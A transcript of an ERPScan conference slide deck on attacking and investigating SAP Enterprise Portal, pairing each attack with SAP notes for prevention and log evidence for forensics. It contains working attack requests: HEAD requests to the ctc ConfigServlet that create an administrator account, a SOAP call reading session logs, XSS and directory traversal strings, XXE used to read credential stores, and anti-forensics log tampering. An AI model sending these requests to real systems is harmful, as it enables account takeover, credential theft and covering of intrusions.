SAP Portal: Hacking and forensics€¦ · Secure configuration and patch management Disable them...
Transcript of SAP Portal: Hacking and forensics€¦ · Secure configuration and patch management Disable them...
Invest in securityto secure investments
SAP Portal: Hacking and forensicsDmitry Chastukhin – Director of SAP pentest/research teamEvgeny Neyolov – Security analyst, (anti)forensics research
ERPScan
Leading SAP AG partner in the field of discovering security vulnerabilities by the number of found vulnerabilities
• Developing software for SAP security monitoring
• Talks at 35+ security conferences worldwide: BlackHat(US/EU/DC/UAE), RSA, Defcon, CONFidence, HITB, etc.
• First to develop software for NetWeaver J2EE assessment
• The only solution to assess all areas of SAP Security
• Research team with experience in different areas of securityfrom ERP and web security to mobile, embedded devices, andcritical infrastructure, accumulating their knowledge on SAPresearch.
2erpscan.com ERPScan — invest in security to secure investments
Dmitry Chastukhin
Business application security expert
Yet another security researcher
3erpscan.com ERPScan — invest in security to secure investments
Agenda
• SAP security
• SAP forensics WTF?!
• Say hello to SAP Portal
• Breaking SAP Portal
• Catch me if you can
• Conclusion
4erpscan.com ERPScan — invest in security to secure investments
SAP
• The most popular business application
• More than 180000 customers worldwide
• More than 70% of Forbes 500 run SAP
• More than 40% of ERP market in Poland
5erpscan.com ERPScan — invest in security to secure investments
SAP security
Espionage• Stealing financial information• Stealing corporate secrets• Stealing supplier and customer lists• Stealing HR data
Fraud• False transactions• Modification of master data
Sabotage• Denial of service• Modification of financial reports• Access to technology network (SCADA) by trust relations
6erpscan.com ERPScan — invest in security to secure investments
0
5
10
15
20
25
30
35
2003 2004 2005 2006 2007 2008 2009 2010 2011 2012 2013
SAP security
• BlackHat
• Defcon
• HITB
• RSA
• CONFidence
• DeepSec
• Hacktivity
• Troopers
• Source
Source: SAP Security in Figures 2013
LINK
7erpscan.com ERPScan — invest in security to secure investments
8erpscan.com ERPScan — invest in security to secure investments
More than 2600 in total
How easy? SAP Security Notes
Is it remotely exploitable?
> 5000 non-web SAP services exposed in the worldincluding Dispatcher, Message server, SapHostControl, etc.
9erpscan.com ERPScan — invest in security to secure investments
sapscan.com
What about other services?
0
1
2
3
4
5
6
7
8
9
SAP Dispatcher SAP MMC SAP Message Server SAP HostControl SAP ITS Agate SAP Message Serverhttpd
World
10erpscan.com ERPScan — invest in security to secure investments
What about unpublished threats?
• Companies are not interested in publishing information about their breaches
• There are a lot of internal breaches thanks to unnecessarily given authorizations (An employee by mistake buys hundreds of excavators instead of ten)
• There are known stories about backdoors left by developers in custom ABAP code
• How can you be sure that, if a breach occurs, you can find evidence?
11erpscan.com ERPScan — invest in security to secure investments
If there are no attacks, it doesn’t mean anything
• Companies don’t like to share it
• Companies don’t use security audit ~10%
• Even if used, nobody manages it ~5%
• Even if managed, no correlation ~1%
SAP Forensics
erpscan.com 12ERPScan — invest in security to secure investments
Typical SAP audit options
• ICM log icm/HTTP/logging_0 70%
• Security audit log in ABAP 10%
• Table access logging rec/client 4%
• Message Server log ms/audit 2%
• SAP Gateway access log 2%
* The percentage of companies is based on our security assessments and product implementations.
erpscan.com 13ERPScan — invest in security to secure investments
What do we see?
• A lot of research
• Real attacks
• Lack of logging practice
• Many vulnerabilities are hard to close → We need to monitor them, at least
erpscan.com 14ERPScan — invest in security to secure investments
What do we need to monitor? External attacks on SAP
Attack users and SAP GUI
SAP Portal and WEB
Exposed SAP services
SAProuter
* Ideally, we should control everything, but this talk has limits, so let’s focus on the most critical areas.
Awareness
Secure configuration and patch management
Disable them
•Too much issues and custom configuration•Can be 0-days•Need to concentrate on this area
erpscan.com 15ERPScan — invest in security to secure investments
• Point of web access
to SAP systems
• Point of web access to
other corporate systems
• Way for attackers
to get access to SAP
from the Internet
Say hello to Portal
erpscan.com 16ERPScan — invest in security to secure investments
EP architecture
erpscan.com 17ERPScan — invest in security to secure investments
Okay, okay. SAP Portal is important, and it has many links to other modules.
So what?
erpscan.com 18ERPScan — invest in security to secure investments
SAP Logging
erpscan.com 19
“If you are running an ABAP + Java installation of Web AS with SAP Web Dispatcher as a load balancing solution, you can safely disable logging of HTTP requests and responses on J2EE Engine, and use the corresponding CLF logs of SAP Web Dispatcher. This also improves the HTTP communication performance. The only drawback of using the Web Dispatcher’s CLF logs is that no information is available about the user executing the request(since the user is not authenticated on the Web Dispatcher, but on the J2EE Engine instead).“
SOURCE: SAP HELP
*Not the only…. There are many complex attacks with POST requests.
ERPScan — invest in security to secure investments
SAP J2EE Logging
erpscan.com 20
• Categories of system events recording:– System – all system related security and administrative logs
– Applications – all system events related to business logic
– Performance – reserved for single activity tracing
• Default location of these files in your file system:\usr\sap\<sid>\<id>\j2ee\cluster\<node>\log\
ERPScan — invest in security to secure investments
SAP J2EE Logging
erpscan.com 21
• The developer trace files of the Java instance<SID>\<instance name>\work
• The developer trace files of the central services<SID>\<instance name>\work
<SID>\<instance name>\log
• Java server logs<SID>\<instance name>\j2ee\cluster\server<n>\log
ERPScan — invest in security to secure investments
•
Full logging is not always the best option
erpscan.com 22ERPScan — invest in security to secure investments
SAP Management Console
erpscan.com 23ERPScan — invest in security to secure investments
SAP Management Console
• SAP MMC: centralized system management
• SAP MMC has remote commands
• Commands are simple SOAP requests
• Allowing to see the trace and log messages
• It’s not bad if you only use it sometimes and delete logs after use, but…
erpscan.com 24ERPScan — invest in security to secure investments
SAP Management Console
erpscan.com 25
What can we find in logs?
Right!The file userinterface.log contains calculated JSESIONID
But…The attacker must have credentials to read the log file
WRONG!
ERPScan — invest in security to secure investments
SAP Management Console
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xs="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Header>
<sapsess:Session
xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/">
<enableSession>true</enableSession>
</sapsess:Session>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<ns1:ReadLogFile xmlns:ns1="urn:SAPControl">
<filename>j2ee/cluster/server0/log/system/userinterface.log</filename>
<filter/>
<language/>
<maxentries>%COUNT%</maxentries>
<statecookie>EOF</statecookie>
</ns1:ReadLogFile>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
erpscan.com 26ERPScan — invest in security to secure investments
Prevention
LINK to SAP HELP
• Don’t use TRACE_LEVEL = 3
• Delete traces when work is finished
• Limit access to dangerous methods
• Install notes 927637 and 1439348
• Mask security-sensitive data in HTTP access log
erpscan.com 27ERPScan — invest in security to secure investments
Prevention
LINK to SAP HELP
erpscan.com 28
• The HTTP Provider service can mask security-sensitive URL parameters, cookies, or headers
• By default, only for the headers listed below– Path Parameter: jsessionid
– Request Parameters: j_password, j_username, j_sap_password, j_sap_again, oldPassword, confirmNewPassword,ticket
– HTTP Headers: Authorization, Cookie (JSESSIONID, MYSAPSSO2)
ERPScan — invest in security to secure investments
SAP NetWeaver J2EE
erpscan.com 29ERPScan — invest in security to secure investments
Access Control
• Web Dynpro - programmatic
• Portal iViews - programmatic
• J2EE Web apps - declarative
erpscan.com 30ERPScan — invest in security to secure investments
Programmatic
By UME
DeclarativeBy WEB.XML
Access Control
• The central entity in the J2EE authorization model is the security role
• Programmers define the application-specific roles in the J2EE deployment descriptor
erpscan.com 31ERPScan — invest in security to secure investments
web.xml web-j2ee-engine.xml
web.xml
<servlet>
<servlet-name>CriticalAction</servlet-name>
<servlet-class>com.sap.admin.Critical.Action</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>CriticalAction</</servlet-name>
<url-pattern>/admin/critical</url-pattern>
</servlet-mapping
<security-constraint>
<web-resource-collection>
<web-resource-name>Restrictedaccess</web-resource-name>
<url-pattern>/admin/*</url-pattern>
<http-method>GET</http-method>
</web-resource-collection>
<auth-constraint>
<role-name>administrator</role-name>
</auth-constraint>
</security-constraint>
Verb Tampering
erpscan.com 32ERPScan — invest in security to secure investments
Verb Tampering
• If we are trying to get access to an application using GET – we need a login:pass and administrator role
• What if we try to get access to application using HEAD instead GET?
• PROFIT!
• Did U know about ctc?
erpscan.com 33ERPScan — invest in security to secure investments
Verb Tampering
Need Admin account in SAP Portal?
Just send two HEAD requests
• Create new user CONF:idence
HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;
CREATEUSER;USERNAME=CONF,PASSWORD=idence
• Add the user CONF to the group Administrators
HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;
ADD_USER_TO_GROUP;USERNAME=CONF,GROUPNAME=Administrators
* Works when UME uses JAVA database.
erpscan.com 34ERPScan — invest in security to secure investments
• Install SAP notes 1503579, 1616259, 1589525, 1624450
• Install other SAP notes about Verb Tampering • Scan applications with ERPScan WEB.XML
checker • Disable the applications that are not necessary
Prevention
erpscan.com 35ERPScan — invest in security to secure investments
Investigation
erpscan.com 36ERPScan — invest in security to secure investments
[Apr 3, 2013 1:23:59 AM ] - 192.168.192.14
: GET /ctc/ConfigServlet HTTP/1.1 401 1790
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14
: HEAD /ctc/ConfigServlet HTTP/1.1 200 0
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14
: HEAD
/ctc/ConfigServlet?param=com.sap.ctc.util.Use
rConfig;CREATEUSER;USERNAME=CONF,PASSWORD=ide
nce HTTP/1.0 200 0
j2ee\cluster\<node>\log\system\httpaccess\responses.trc
web.xml
<servlet><servlet-name>CriticalAction</servlet-name><servlet-class>com.sap.admin.Critical.Action</servlet-
class></servlet><servlet-mapping>
<servlet-name>CriticalAction</</servlet-name><url-pattern>/admin/critical</url-pattern>
</servlet-mapping<security-constraint><web-resource-collection><web-resource-name>Restrictedaccess</web-resource-name><url-pattern>/admin/*</url-pattern><http-method>GET</http-method><http-method>HEAD</http-method></web-resource-collection><auth-constraint>
<role-name>administrator</role-name></auth-constraint></security-constraint>
GET /admin/critical/CriticalAction
GET /servlet/com.sap.admin.Critical.Action
Invoker servlet
erpscan.com 37ERPScan — invest in security to secure investments
Invoker Servlet
• Want to execute an OS command on J2EE server remotely?
• Maybe upload a backdoor in a Java class?
• Or sniff all traffic?
Still remember ctc?
erpscan.com 38ERPScan — invest in security to secure investments
Invoker Servlet
erpscan.com 39ERPScan — invest in security to secure investments
Prevention
erpscan.com 40ERPScan — invest in security to secure investments
• Update to the latest patch 1467771, 1445998 • “EnableInvokerServletGlobally” must be “false” • Check all WEB.XML files with ERPScan WEBXML
checker
Investigation
erpscan.com 41
#1.5#000C29C2603300790000003A000008700004D974E7CCC6D8#13649960352
03#/System/Security/Audit#sap.com/tc~lm~ctc~util~basic_ear#com.sa
p.security.core.util.SecurityAudit#Guest#0#SAP J2EE Engine JTA
Transaction :
[024423a006e18]#n/a##217c5d309c6311e29bca000c29c26033#SAPEngine_A
pplication_Thread[impl:3]_22##0#0#Info#1#com.sap.security.core.ut
il.SecurityAudit#Plain###Guest | USER.CREATE |
USER.PRIVATE_DATASOURCE.un:CONF | | SET_ATTRIBUTE:
uniquename=[CONF]#
#1.5#000C29C2603300680002C97A000008700004D974E8354D1D#13649960420
62#/System/Security/Audit/J2EE#sap.com/irj#com.sap.engine.service
s.security.roles.audit#Guest#182818##n/a##0c5bfef08bc511e287e6000
c29c26033#Thread[Thread-
50,5,SAPEngine_Application_Thread[impl:3]_Group]##0#0#Info#1#com.
sap.engine.services.security.roles.audit#Java###{0}:
Authorization check for caller assignment to J2EE security role
[{1} : {2}].#3#ACCESS.OK#SAP-J2EE-Engine#guests#
ERPScan — invest in security to secure investments
Investigation
erpscan.com 41ERPScan — invest in security to secure investments
XSS
• Many XSSs in Portal
• But sometimes HttpOnly
• But when we exploit XSS, we can use the features of SAP Portal
erpscan.com 43ERPScan — invest in security to secure investments
EPCF
EPCF
• EPCF provides a JavaScript API designed for the client-side communication between portal components and the portal core framework
• Enterprise Portal Client Manager (EPCM)
• iViews can access the EPCM object from every portal page or IFrame
• Every iView contains the EPCM object<SCRIPT>
alert(EPCM.loadClientData("urn:com.sap.myObjects", "person");
</SCRIPT>
erpscan.com 44ERPScan — invest in security to secure investments
For example, EPCF used for transient user data buffer for iViews
Prevention
• Install SAP note 1656549
erpscan.com 45ERPScan — invest in security to secure investments
#Plain###192.168.192.26 : GET
/irj/servlet/prt/portal/prtroot/com.sap.porta
l.usermanagement.admin.UserMapping?systemid=M
S_EXCHANGEaaaa%3C/script%3E%3Cscript%3Ealert(
%27xSS%27)%3C/script%3E HTTP/1.1 200 3968#
j2ee\cluster\<node>\log\system\httpaccess\res
ponses.trc
Investigation
erpscan.com 46ERPScan — invest in security to secure investments
• Web Dynpro unauthorized modifications
• For example:– somebody steals an account using XSS/CSRF/Sniffing
– then tries to modify the severity level of logs
Web Dynpro JAVA
erpscan.com 47ERPScan — invest in security to secure investments
Web Dynpro JAVA
LINK to SAP HELP
erpscan.com 48ERPScan — invest in security to secure investments
• No traces of change in default log files
\cluster\server0\log\system\httpaccess\responses.log
• Web Dynpro sends all data by POST, and we only see GET URLs in responses.log • But sometimes we can find information by indirect signs
[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET
/webdynpro/resources/sap.com/tc~lm~webadmin~log_config
~wd/Components/com.sap.tc.log_configurator.LogConfigur
ator/warning.gif HTTP/1.1 200 110
• The client loaded images from the server during some changes
Investigation
erpscan.com 49ERPScan — invest in security to secure investments
Investigation
erpscan.com 50ERPScan — invest in security to secure investments
• Most actions have icons
• They have to be loaded from the server
• Usually, legitimate users have them all in cache
• Attackers usually don’t have them, so they make requests to the server
• That’s how we can identify potentially malicious actions
• But there should be correlation with a real user’s activity
• False positives are possible:– New legitimate user
– Old user clears cache
– Other
Directory traversal
FIX
erpscan.com 51ERPScan — invest in security to secure investments
Directory traversal fix bypass
erpscan.com 52ERPScan — invest in security to secure investments
Prevention
erpscan.com 53ERPScan — invest in security to secure investments
• Install SAP note 1630293
Investigation
erpscan.com 54ERPScan — invest in security to secure investments
/../
!252f..!252f
Breaking SAP Portal
• Found a file in the OS of SAP Portal with the encrypted passwords for administration and DB
• Found a file in the OS of SAP Portal with keys to decrypt passwords
• Found a vulnerability (another one ;)) which allows reading the files with passwords and keys
• Decrypt passwords and log into Portal
• PROFIT!
erpscan.com 55ERPScan — invest in security to secure investments
Read the file
How can we read the file?
• Directory Traversal
• OS Command execution
• XML External Entity (XXE)
erpscan.com 56ERPScan — invest in security to secure investments
XXE in Portal: Details
erpscan.com 57
• Injection of malicious requests into XML packets
• Can lead to unauthorized file read, DoS, SSRF
• There is an XXE vulnerability in SAP Portal
• Can be exploited by modification of POST request
• It is possible to read any file from OS and much more
ERPScan — invest in security to secure investments
XXE in Portal
erpscan.com 58ERPScan — invest in security to secure investments
XXE in Portal
erpscan.com 59ERPScan — invest in security to secure investments
XXE
Error based XXE
erpscan.com 60ERPScan — invest in security to secure investments
XXE in Portal: Result
• We can read any file
• Including config with passwords
• The SAP J2EE Engine stores the database user SAP<SID>DB; its password is here:
\usr\sap\<SID>\SYS\global\security\data\SecStore.properties
erpscan.com 61ERPScan — invest in security to secure investments
rdbms.maximum_connections=5
system.name=TTT
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/
data/SecStore.key
secstorefs.secfile=/oracle/TTT/sapmnt/global/security/
data/SecStore.properties
secstorefs.lib=/oracle/TTTsapmnt/global/security/lib
rdbms.driverLocation=/oracle/client/10x_64/instantclie
nt/ojdbc14.jar
rdbms.connection=jdbc/pool/TTT
rdbms.initial_connections=1
Where are the passwords? (config.properties)
erpscan.com 62ERPScan — invest in security to secure investments
rdbms.maximum_connections=5
system.name=TTT
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/
data/SecStore.key
secstorefs.secfile=/oracle/TTT/sapmnt/global/security/
data/SecStore.properties
secstorefs.lib=/oracle/TTTsapmnt/global/security/lib
rdbms.driverLocation=/oracle/client/10x_64/instantclie
nt/ojdbc14.jar
rdbms.connection=jdbc/pool/TTT
rdbms.initial_connections=1
Where are the passwords? (config.properties)
erpscan.com 63ERPScan — invest in security to secure investments
$internal/version=Ni4zFF4wMSeaseforCCMxegAfx
admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwu
eur2445yxgBS
admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgq
Dp+QD04b0Fh
jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI
0VGegH
admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr
4ZUgRTQ
$internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt
$internal/mode=encrypted
admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV7
5eC6/5S3E
SecStore.properties
But where is the key?
erpscan.com 64ERPScan — invest in security to secure investments
rdbms.maximum_connections=5
system.name=TTT
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/
data/SecStore.key
secstorefs.secfile=/oracle/TTT/sapmnt/global/security/
data/SecStore.properties
secstorefs.lib=/oracle/TTTsapmnt/global/security/lib
rdbms.driverLocation=/oracle/client/10x_64/instantclie
nt/ojdbc14.jar
rdbms.connection=jdbc/pool/TTT
rdbms.initial_connections=1
config.properties
erpscan.com 65ERPScan — invest in security to secure investments
Get the password
• We have an encrypted password
• We have a key to decrypt it
We got the J2EE admin and JDBC login:password!
erpscan.com 66ERPScan — invest in security to secure investments
Prevention
erpscan.com 67
• Install SAP note 1619539• Restrict read access to files SecStore.propertiesand SecStore.key
ERPScan — invest in security to secure investments
Investigation
erpscan.com 68
POST
/irj/servlet/prt/portal/prteventname/HtmlbE
vent/prtroot/pcd!3aportal_content!2fadminis
trator!2fsuper_admin!2fsuper_admin_role!2fc
om.sap.portal.content_administration!2fcom.
sap.portal.content_admin_ws!2fcom.sap.km.Ad
minContent!2fcom.sap.km.AdminContentExplore
r!2fcom.sap.km.AdminExplorer/ HTTP/1.1
ERPScan — invest in security to secure investments
Investigation
• The only one way to get HTTP POST request values is to enable HTTP Trace
• Visual Administrator → Dispatcher → HTTP Provider → Properties: HttpTrace = enable• For 6.4 and 7.0 SP12 and lower:
– On Dispatcher: /j2ee/cluster/dispatcher/log/defaultTrace.trc
– On Server \j2ee\cluster\server0\log\system\httpaccess\responses.0.trc
• For 7.0 SP13 and higher:/j2ee/cluster/dispatcher/log/services/http/req_resp.trc
• Manually analyze all requests for XXE attacks
erpscan.com 69ERPScan — invest in security to secure investments
Malicious file upload: Attack
• Knowledge management allows uploading to the server different types of files that can store malicious content
• Sometimes, if guest access is allowed, it is possible to upload any file without being an authenticated user
• For example, it can be an HTML file with JavaScript that steals cookies
erpscan.com 70ERPScan — invest in security to secure investments
Malicious file upload: Attack
erpscan.com 71ERPScan — invest in security to secure investments
Malicious file upload: Attack
erpscan.com 72ERPScan — invest in security to secure investments
Malicious file upload: Forensics
[Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST
/irj/servlet/prt/portal/prteventname/HtmlbEvent/prt
root/pcd!3aportal_content!2fspecialist!2fcontentman
ager!2fContentManager!2fcom.sap.km.ContentManager!2
fcom.sap.km.ContentExplorer!2fcom.sap.km.ContentDoc
Explorer!2fcom.sap.km.DocsExplorer/documents
HTTP/1.1 200 13968
[Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET
/irj/go/km/docs/etc/public/mimes/images/html.gif
HTTP/1.1 200 165
*Again, images can help us.
erpscan.com 73ERPScan — invest in security to secure investments
Malicious file upload: Prevention
erpscan.com 74
Enable File Extension and Size Filter:• System Administration → System Configuration →
Content Management → Repository → Filters → Show Advanced Options → File Extension and Size Filter
• Select either the All repositories parameter or at least one repository from the repository list in the Repositories parameter
ERPScan — invest in security to secure investments
Malicious file upload: Prevention
erpscan.com 75
Enable Malicious Script Filter:• System Administration → System Configuration →
Content Management → Repository → Filters → Show Advanced Options → Malicious Script Filter
• The filter also detects executable scripts in files that are being modified and encodes them when they are saved
– enable Forbidden Scripts. Comma-separated list of banned script tags that will be encoded when the filter is applied
– enable the Send E-Mail to Administrator option
ERPScan — invest in security to secure investments
Portal post-exploitation
• Lot of links to other systems in corporate LAN
• Using SSRF, attackers can get access to these systems
What is SSRF?
erpscan.com 76ERPScan — invest in security to secure investments
• We send Packet A to Service A
• Service A initiates Packet B to service B
• Services can be on the same or different hosts
• We can manipulate some fields of packet B within packet A
• Various SSRF attacks depend on how many fields we can control on packet B
SSRF History: Basics
Packet A
Packet B
erpscan.com 77ERPScan — invest in security to secure investments
Partial Remote SSRF: HTTP attacks on other services
HTTP Server Corporate network
Direct attack GET /vuln.jsp
SSRF Attack
SSRF Attack Get /vuln.jst
A B
erpscan.com 78ERPScan — invest in security to secure investments
Gopher uri scheme
• Using gopher:// uri scheme, it is possible to send TCP packets– Exploit OS vulnerabilities
– Exploit old SAP application vulnerabilities
– Bypass SAP security restrictions
– Exploit vulnerabilities in local services
More info in our BH2012 presentation:
SSRF vs. Business Critical Applications
LINK
erpscan.com 79ERPScan — invest in security to secure investments
Portal post-exploitation
erpscan.com 80ERPScan — invest in security to secure investments
Anti-forensics
erpscan.com 81ERPScan — invest in security to secure investments
Anti-forensics
• Flooding
• Deleting
• Changing
erpscan.com 82ERPScan — invest in security to secure investments
Anti-forensics
Log flooding
• 5 active logs
• Maximum log file size is 10 Mb
• Archiving when all logs reach the maximum size
• If file.0.log -> max size then open file.1.log
• If file.4.log -> max size then zip all and backup
• Rewriting the same files after archiving
erpscan.com 83ERPScan — invest in security to secure investments
Anti-forensics
Log deleting
• SAP locks write access to the only one active log
• SAP allows reading/writing logs, so it is possible to delete them
• It could compromise the attacker’s presence
Log changing
• SAP locks write access only to the one active log
• It is possible to write into any other log file
erpscan.com 84ERPScan — invest in security to secure investments
Securing SAP Portal
• Patching
• Secure configuration
• Enabling HTTP Trace with masking
• Malicious script filter
• Log archiving
• Additional place for log storage
• Monitoring of security events– Own scripts, parse common patterns
– ERPScan has all existing web vulns/0-day patterns
erpscan.com 85ERPScan — invest in security to secure investments
Conclusion
It is possible to protect yourself from these kinds of issues, and we are working close with SAP to keep customers secure
SAP Guides
It’s all in your hands
Regular security assessments
ABAP code review
Monitoring technical security
Segregation of Duties
Security events monitoring
Future work
I'd like to thank SAP's Product Security Response Team for thegreat cooperation to make SAP systems more secure. Researchis always ongoing, and we can't share all of it today. If you wantto be the first to see new attacks and demos, follow us at@erpscan and attend future presentations:
• July 31 – BlackHat (Las Vegas, USA)
erpscan.com 87ERPScan — invest in security to secure investments
Web: www.erpscan.come-mail: [email protected]
Twitter: @erpscan@_chipik@neyolov